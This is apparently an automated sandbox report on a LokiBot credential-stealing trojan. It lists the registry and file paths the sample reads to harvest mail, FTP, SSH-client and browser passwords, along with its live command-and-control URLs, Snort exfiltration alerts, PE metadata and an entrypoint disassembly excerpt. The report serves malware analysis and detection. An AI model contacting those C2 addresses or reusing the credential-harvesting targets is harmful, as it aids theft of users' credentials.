Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe TID: 7076

Thread sleep time: -120000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe

Code function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

0_2_00403D74

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: wi7zJOZT2r.exe, 00000000.00000002.368693831.000000000065A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe

Code function: 0_2_00402B7C GetProcessHeap,RtlAllocateHeap,

0_2_00402B7C

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe

Code function: 0_2_0040317B mov eax, dword ptr fs:[00000030h]

0_2_0040317B

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe

Code function: 0_2_00406069 GetUserNameW,

0_2_00406069

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000002.368819944.0000000002984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.368693831.000000000065A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wi7zJOZT2r.exe PID: 7088, type: MEMORYSTR
Source: Yara match	File source: wi7zJOZT2r.exe, type: SAMPLE
Source: Yara match	File source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Code function: PopPassword		0_2_0040D069
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Code function: SmtpPassword		0_2_0040D069

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Source: Yara match	File source: wi7zJOZT2r.exe, type: SAMPLE
Source: Yara match	File source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Lokibot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000002.368819944.0000000002984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.368693831.000000000065A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wi7zJOZT2r.exe PID: 7088, type: MEMORYSTR
Source: Yara match	File source: wi7zJOZT2r.exe, type: SAMPLE
Source: Yara match	File source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	21 Virtualization/Sandbox Evasion	1 Input Capture	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Access Token Manipulation	2 Credentials in Registry	1 Account Discovery	SMB/Windows Admin Shares	1 Archive Collected Data	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Deobfuscate/Decode Files or Information	NTDS	1 System Owner/User Discovery	Distributed Component Object Model	2 Data from Local System	Scheduled Transfer	112 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	3 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
wi7zJOZT2r.exe	100%	ReversingLabs	Win32.Trojan.LokiBot
wi7zJOZT2r.exe	89%	Virustotal		Browse
wi7zJOZT2r.exe	100%	Avira	TR/Crypt.XPACK.Gen
wi7zJOZT2r.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
publicspeaking.co.id	17%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://kbfvzoboss.bid/alien/fre.php	0%	URL Reputation	safe
http://alphastand.win/alien/fre.php	0%	URL Reputation	safe
http://alphastand.trade/alien/fre.php	0%	URL Reputation	safe
http://alphastand.trade/alien/fre.php	0%	URL Reputation	safe
http://alphastand.top/alien/fre.php	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
https://publicspeaking.co.id/cjay/Panel/five/fre.php8	100%	Avira URL Cloud	malware
https://publicspeaking.co.id/cjay/Panel/five/fre.php	100%	Avira URL Cloud	malware
http://publicspeaking.co.id/cjay/Panel/five/fre.php	100%	Avira URL Cloud	malware
http://www.publicspeaking.co.id/cjay/Panel/five/fre.php	100%	Avira URL Cloud	malware
http://publicspeaking.co.id/cjay/Panel/five/fre.php	10%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
publicspeaking.co.id	216.239.38.21	true	false	17%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: safe	unknown
http://publicspeaking.co.id/cjay/Panel/five/fre.php	false	10%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: safe URL Reputation: safe	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://publicspeaking.co.id/cjay/Panel/five/fre.php	wi7zJOZT2r.exe	false	Avira URL Cloud: malware	unknown
https://publicspeaking.co.id/cjay/Panel/five/fre.php8	wi7zJOZT2r.exe, 00000000.00000002.368819944.0000000002977000.00000004.00000020.00020000.00000000.sdmp, wi7zJOZT2r.exe, 00000000.00000002.368693831.000000000065A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.publicspeaking.co.id/cjay/Panel/five/fre.php	wi7zJOZT2r.exe, 00000000.00000002.368693831.000000000065A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.ibsensoftware.com/	wi7zJOZT2r.exe	false	URL Reputation: safe URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
216.239.38.21	publicspeaking.co.id	United States		15169	GOOGLEUS	false
216.239.32.21	unknown	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1283498
Start date and time:	2023-08-01 04:46:07 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 2m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	1
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	wi7zJOZT2r.exe
Original Sample Name:	3dc7d72c3b38ce465684f96faeaa0ce7.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/2@7/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 95.9%) Quality average: 77% Quality standard deviation: 28.6%
HCA Information:	Successful, ratio: 100% Number of executed functions: 35 Number of non-executed functions: 5
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:47:04	API Interceptor	4x Sleep call for process: wi7zJOZT2r.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

Download File

Process:	C:\Users\user\Desktop\wi7zJOZT2r.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Download File

Process:	C:\Users\user\Desktop\wi7zJOZT2r.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbON:u
MD5:	89CA7E02D8B79ED50986F098D5686EC9
SHA1:	A602E0D4398F00C827BFCF711066E67718CA1377
SHA-256:	30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
SHA-512:	C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.0585127096924465
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	wi7zJOZT2r.exe
File size:	106'496 bytes
MD5:	3dc7d72c3b38ce465684f96faeaa0ce7
SHA1:	491568fcf9f2e718d587621361b0e82b681c9b8d
SHA256:	5388ab765bd614a7350d9ce7126afab89ca2e0b0e55d23e1cd43459cb9bc745d
SHA512:	d7fb5bd29a2e0da7405c3890c62e830998e8db7328b908d673248643af96f73adc0c19523c317a454f6d689fcf7d5fd4bee093513ed8b8f1233ec3794565bdf6
SSDEEP:	1536:czvQSZpGS4/31A6mQgL2eYCGDwRcMkVQd8YhY0/EqEIzmd:nSHIG6mQwGmfOQd8YhY0/ExUG
TLSH:	BFA31942B2A5C030F7B74DB2BB73A5B7857E7C332D22C84E9352459A14215E1EB7AB13
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x.....................K.K.............=2......................................=2......=2......Rich............PE..L.....lW...

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4139de
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x576C0885 [Thu Jun 23 16:04:21 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	0239fd611af3d0e9b0c46c5837c80e09

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push ecx
and dword ptr [ebp-04h], 00000000h
lea eax, dword ptr [ebp-04h]
push esi
push edi
push eax
call 00007F73B53E3C59h
push eax
call 00007F73B53E3C36h
xor esi, esi
mov edi, eax
pop ecx
pop ecx
cmp dword ptr [ebp-04h], esi
jle 00007F73B53E3E16h
push 004188BCh
push dword ptr [edi+esi*4]
call 00007F73B53D62E5h
pop ecx
pop ecx
test eax, eax
je 00007F73B53E3DFDh
push 00002710h
call 00007F73B53D6B9Ah
pop ecx
inc esi
cmp esi, dword ptr [ebp-04h]
jl 00007F73B53E3DCEh
push 00000000h
call 00007F73B53E3C2Eh
push 00000000h
call 00007F73B53E3F42h
pop ecx
pop edi
xor eax, eax
pop esi
mov esp, ebp
pop ebp
retn 0010h
push ebp
mov ebp, esp
xor eax, eax
push eax
push eax
push E567384Dh
push eax
call 00007F73B53D3589h
push dword ptr [ebp+08h]
call eax
pop ebp
ret
push ebp
mov ebp, esp
push esi
mov esi, dword ptr [ebp+08h]
test esi, esi
je 00007F73B53E3E54h
push esi
call 00007F73B53D60B0h
pop ecx
test eax, eax
je 00007F73B53E3E49h
push esi
call 00007F73B53D40ECh
pop ecx
test eax, eax
je 00007F73B53E3E3Eh
mov eax, dword ptr [0049FDECh]
cmp dword ptr [ebp+10h], 00000000h
cmovne eax, dword ptr [ebp+10h]
push eax
push dword ptr [0049FDE8h]
call 00007F73B53D5AE4h
push dword ptr [ebp+0Ch]
push dword ptr [0049FDE8h]
call 00007F73B53D5AD6h
push 00000000h
push 00000000h
push esi

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[ASM] VS2003 (.NET) build 3077
[ASM] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2013 UPD5 build 40629
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x18ed0	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x15000	0x5c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x136f5	0x13800	False	0.5685096153846154	data	6.49204829439013	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x15000	0x4060	0x4200	False	0.3700284090909091	DOS executable (COM)	4.268966749321832	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1a000	0x85e24	0x200	False	0.130859375	OpenPGP Public Key	0.941116049548311	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.x	0xa0000	0x2000	0x2000	False	0.02001953125	data	0.2244612956123434	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
WS2_32.dll	getaddrinfo, freeaddrinfo, closesocket, WSAStartup, socket, send, recv, connect
KERNEL32.dll	GetProcessHeap, HeapFree, HeapAlloc, SetLastError, GetLastError
ole32.dll	CoCreateInstance, CoInitialize, CoUninitialize
OLEAUT32.dll	VariantInit, SysFreeString, SysAllocString

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.3216.239.38.2149697802021641 08/01/23-04:47:03.589313	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49697	80	192.168.2.3	216.239.38.21
192.168.2.3216.239.38.2149697802024317 08/01/23-04:47:03.589313	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49697	80	192.168.2.3	216.239.38.21
192.168.2.3216.239.32.2149702802825766 08/01/23-04:47:05.661750	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49702	80	192.168.2.3	216.239.32.21
192.168.2.3216.239.38.2149697802024312 08/01/23-04:47:03.589313	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49697	80	192.168.2.3	216.239.38.21
192.168.2.3216.239.38.2149699802825766 08/01/23-04:47:04.225849	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49699	80	192.168.2.3	216.239.38.21
192.168.2.3216.239.38.2149697802025381 08/01/23-04:47:03.589313	TCP	2025381	ET TROJAN LokiBot Checkin	49697	80	192.168.2.3	216.239.38.21
192.168.2.3216.239.32.2149701802825766 08/01/23-04:47:04.869622	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49701	80	192.168.2.3	216.239.32.21
192.168.2.3216.239.32.2149701802024318 08/01/23-04:47:04.869622	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49701	80	192.168.2.3	216.239.32.21
192.168.2.3216.239.32.2149701802021641 08/01/23-04:47:04.869622	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49701	80	192.168.2.3	216.239.32.21
192.168.2.3216.239.38.2149700802825766 08/01/23-04:47:04.525369	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49700	80	192.168.2.3	216.239.38.21
192.168.2.3216.239.38.2149699802024313 08/01/23-04:47:04.225849	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49699	80	192.168.2.3	216.239.38.21
192.168.2.3216.239.38.2149700802024318 08/01/23-04:47:04.525369	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49700	80	192.168.2.3	216.239.38.21
192.168.2.3216.239.38.2149698802024317 08/01/23-04:47:03.996311	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49698	80	192.168.2.3	216.239.38.21
192.168.2.3216.239.32.2149702802025381 08/01/23-04:47:05.661750	TCP	2025381	ET TROJAN LokiBot Checkin	49702	80	192.168.2.3	216.239.32.21
192.168.2.3216.239.32.2149701802024313 08/01/23-04:47:04.869622	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49701	80	192.168.2.3	216.239.32.21
192.168.2.3216.239.38.2149698802021641 08/01/23-04:47:03.996311	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49698	80	192.168.2.3	216.239.38.21
192.168.2.3216.239.38.2149698802825766 08/01/23-04:47:03.996311	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49698	80	192.168.2.3	216.239.38.21
192.168.2.3216.239.38.2149699802025381 08/01/23-04:47:04.225849	TCP	2025381	ET TROJAN LokiBot Checkin	49699	80	192.168.2.3	216.239.38.21
192.168.2.3216.239.38.2149698802024312 08/01/23-04:47:03.996311	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49698	80	192.168.2.3	216.239.38.21
192.168.2.3216.239.32.2149701802025381 08/01/23-04:47:04.869622	TCP	2025381	ET TROJAN LokiBot Checkin	49701	80	192.168.2.3	216.239.32.21
192.168.2.3216.239.38.2149699802024318 08/01/23-04:47:04.225849	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49699	80	192.168.2.3	216.239.38.21
192.168.2.3216.239.32.2149702802024313 08/01/23-04:47:05.661750	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49702	80	192.168.2.3	216.239.32.21
192.168.2.3216.239.32.2149702802021641 08/01/23-04:47:05.661750	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49702	80	192.168.2.3	216.239.32.21
192.168.2.3216.239.38.2149700802024313 08/01/23-04:47:04.525369	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49700	80	192.168.2.3	216.239.38.21
192.168.2.3216.239.38.2149697802825766 08/01/23-04:47:03.589313	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49697	80	192.168.2.3	216.239.38.21
192.168.2.3216.239.38.2149699802021641 08/01/23-04:47:04.225849	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49699	80	192.168.2.3	216.239.38.21
192.168.2.3216.239.32.2149702802024318 08/01/23-04:47:05.661750	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49702	80	192.168.2.3	216.239.32.21
192.168.2.3216.239.38.2149700802021641 08/01/23-04:47:04.525369	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49700	80	192.168.2.3	216.239.38.21
192.168.2.3216.239.38.2149698802025381 08/01/23-04:47:03.996311	TCP	2025381	ET TROJAN LokiBot Checkin	49698	80	192.168.2.3	216.239.38.21
192.168.2.3216.239.38.2149700802025381 08/01/23-04:47:04.525369	TCP	2025381	ET TROJAN LokiBot Checkin	49700	80	192.168.2.3	216.239.38.21

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 1, 2023 04:47:03.568627119 CEST	49697	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:03.583986044 CEST	80	49697	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:03.584297895 CEST	49697	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:03.589313030 CEST	49697	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:03.604464054 CEST	80	49697	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:03.604659081 CEST	49697	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:03.619658947 CEST	80	49697	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:03.685257912 CEST	80	49697	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:03.685352087 CEST	80	49697	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:03.685589075 CEST	49697	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:03.685652018 CEST	49697	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:03.700661898 CEST	80	49697	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:03.978554010 CEST	49698	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:03.993669987 CEST	80	49698	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:03.993837118 CEST	49698	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:03.996310949 CEST	49698	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:04.011255026 CEST	80	49698	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:04.011425972 CEST	49698	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:04.026386976 CEST	80	49698	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:04.040185928 CEST	80	49698	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:04.040244102 CEST	80	49698	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:04.040344954 CEST	49698	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:04.040489912 CEST	49698	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:04.055339098 CEST	80	49698	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:04.187382936 CEST	49699	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:04.210637093 CEST	80	49699	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:04.210772991 CEST	49699	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:04.225848913 CEST	49699	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:04.249619007 CEST	80	49699	216.239.38.21	192.168.2.3
